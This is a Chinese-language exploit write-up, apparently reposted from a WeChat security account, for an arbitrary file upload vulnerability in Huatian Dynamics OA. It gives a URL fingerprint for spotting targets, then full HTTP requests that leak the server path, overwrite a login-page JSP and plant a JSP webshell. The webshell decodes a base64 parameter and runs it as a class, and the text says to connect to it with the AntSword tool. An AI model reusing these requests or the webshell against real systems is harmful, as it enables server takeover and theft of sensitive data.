一、漏洞描述
1、华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。
2、华天动力OA系统具有极为突出的实用性、易用性和高性价比,实施简便,使用灵便,是实用性OA的代表者和倡导者。
3、华天动力OA存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,控制服务器权限,读取敏感信息等。
二、漏洞发现
系统URL特征如下
/OAapp/WebObjects/OAapp.woa/OAapp/htpages/app
三、漏洞复现
首先需要获取系统的绝对路径
POST /OAapp/jsp/upload.jsp HTTP/1.1Host: xx.xx.xx.xxContent-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QOUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 291------WebKitFormBoundary5Ur8laykKAWws2QOContent-Disposition: form-data; name="file"; filename="swz.xml"Content-Type: image/pngreal path------WebKitFormBoundary5Ur8laykKAWws2QOContent-Disposition: form-data; name="filename"swz.png------WebKitFormBoundary5Ur8laykKAWws2QO--
然后写入normalLoginPageForOther.jsp文件,文件内容为输出一个字符串swzaq
POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1Host: xx.xx.xx.xxContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQmUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 386------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data; name="EDITFILE"; filename="swzaq.txt"Content-Type: image/png<%out.print("swzaq");%>------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data; name="newFileName"D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp------WebKitFormBoundaryzRSYXfFlXqk6btQm--
访问normalLoginPageForOther.jsp文件,如果得到输出字符串swzaq则文件写入成功
GET /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://xx.xx.xx.xx/DNT: 1Connection: closeCookie: JSESSIONID=2D98665244D30D189192C41D9187D55CUpgrade-Insecure-Requests: 1Connection: close
直接写马getshell
POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1Host: xx.xx.xx.xxContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQmUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Cookie: JSESSIONID=D89753D1E5FF5B59DA6DBE0EB96008C3Content-Length: 1443------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data; name="EDITFILE"; filename="swzaq.txt"Content-Type: image/png<%!class VIEW extends ClassLoader{VIEW(ClassLoader c){super(c);}public Class content_based(byte[] b){return super.defineClass(b, 0, b.length);}}public byte[] parameter(String str) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("sun.misc.BASE64Decoder");Object decoder = base64.newInstance();value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });} catch (Exception e) {try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });} catch (Exception ee) {}}return value;}%><%String cls = request.getParameter("swzaq");if (cls != null) {new VIEW(this.getClass().getClassLoader()).content_based(parameter(cls)).newInstance().equals(new Object[]{request,response});}%>------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data; name="newFileName"D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp------WebKitFormBoundaryzRSYXfFlXqk6btQm--
访问该jsp文件,验证shell是否写入成功
http://xx.xx.xx.xx/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
可以看到是正常解析了,最后用蚁剑连接测试
原文始发于微信公众号(守卫者安全):华天动力 OA 任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论